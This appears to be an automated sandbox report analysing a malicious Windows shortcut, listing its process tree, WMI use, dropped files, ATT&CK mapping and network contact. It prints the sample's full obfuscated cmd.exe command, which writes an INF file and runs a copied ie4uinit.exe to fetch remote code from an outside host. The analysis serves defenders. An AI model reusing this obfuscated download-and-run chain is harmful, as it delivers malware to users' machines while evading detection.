Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_02
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.infJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile created: C:\Windows\Temp\OLDF396.tmpJump to behavior
Source: classification engineClassification label: mal52.evad.winZIP@23/9@1/1
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2660496737-530772487-1027249058-1002\Software\Microsoft\Office
Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: ie4uinit.exe.14.drStatic PE information: section name: .didat
Source: ie4uinit.exe.14.drStatic PE information: 0xEF6764A3 [Thu Apr 11 14:56:35 2097 UTC]

Persistence and Installation Behavior

barindex
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeJump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c set "lucky50=e" && set "lucky5=$w" && set "lucky03=version" && set "lucky10=d" && (for %u in (a) do @set "lucky87=%~u") && set "lucky41=fast" && call set "lucky59=%lucky41:~2,1%" && set "lucky85=init" && set "lucky7=t" && set "lucky26=." && set "lucky23=settings" && set "lucky55=si" && (for %q in (c) do @set "lucky29=%~q") && set "lucky65=!lucky26!inf" && set "lucky15=ieu!lucky85!!lucky65!" && call !lucky59!et "lucky11=%app!lucky10!ata%\micro!lucky59!oft\" && !lucky59!et "lucky8=!lucky11!!lucky15!" && (for %p in ("[!lucky03!]" "signature = !lucky5!indows nt$" "[!lucky10!e!lucky59!tinationdirs]" "e4139c=01" "[!lucky10!efaultin!lucky59!tall.windows7]" "unregis!lucky7!erocxs=a687d4" "!lucky10!elfil!lucky50!s=e4139c" "[a687d4]" "%11%\scro\" "%lucky51%j,ni,%lucky21%%lucky0%%lucky0%p%lucky1%%lucky9%%lucky9%sophia-lagoon!lucky26!%lucky56%/81754783" "[e4139c]" "ieu%lucky69%!lucky65!" "[!lucky59!!lucky7!rings]" "lucky69=!lucky85!" "lucky0=t;lucky40" "!lucky59!ervicen!lucky87!me=' '" "lucky21=h" "lucky1=:;lucky35" "lucky9=/" "!lucky59!hortsvcn!lucky87!me=' '" "lucky56=net" "lucky51=b;lucky67" "lucky25=%time%") do @e!lucky29!ho %~p)>"!lucky8!" && !lucky59!et "lucky2=ie4u!lucky85!.!lucky50!xe" && call xcopy /y /c /q %win!lucky10!ir%\!lucky59!ystem32\!lucky2! "!lucky11!*" | set lucky93=nation && !lucky59!t!lucky87!rt "" wmi!lucky29! proce!lucky59!s call !lucky29!rea!lucky7!e "!lucky11!!lucky2! -base!lucky23!" | set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Windows Management Instrumentation		1
Scheduled Task/Job		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts11
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
Scheduled Task/Job		11
Process Injection		LSASS Memory1
Remote System Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
Non-Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Rundll32		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Timestomp		NTDS3
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
File Deletion		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 16737 Sample: Education and Experience.ln... Startdate: 15/02/2023 Architecture: WINDOWS Score: 52 41 Very long command line found 2->41 43 Contains functionality to create processes via WMI 2->43 8 cmd.exe 2 2->8         started        10 ie4uinit.exe 64 2->10         started        13 ie4uinit.exe 2->13         started        15 2 other processes 2->15 process3 dnsIp4 17 cmd.exe 1 8->17         started        19 cmd.exe 1 8->19         started        21 conhost.exe 1 8->21         started        25 2 other processes 8->25 39 sophia-lagoon.net 142.11.222.59, 49727, 80 HOSTWINDSUS United States 10->39 23 ie4uinit.exe 46 10->23         started        process5 process6 27 WMIC.exe 1 17->27         started        30 xcopy.exe 2 19->30         started        33 rundll32.exe 23->33         started        file7 45 Creates processes via WMI 27->45 35 conhost.exe 27->35         started        37 C:\Users\user\AppData\...\ie4uinit.exe, PE32+ 30->37 dropped signatures8 process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.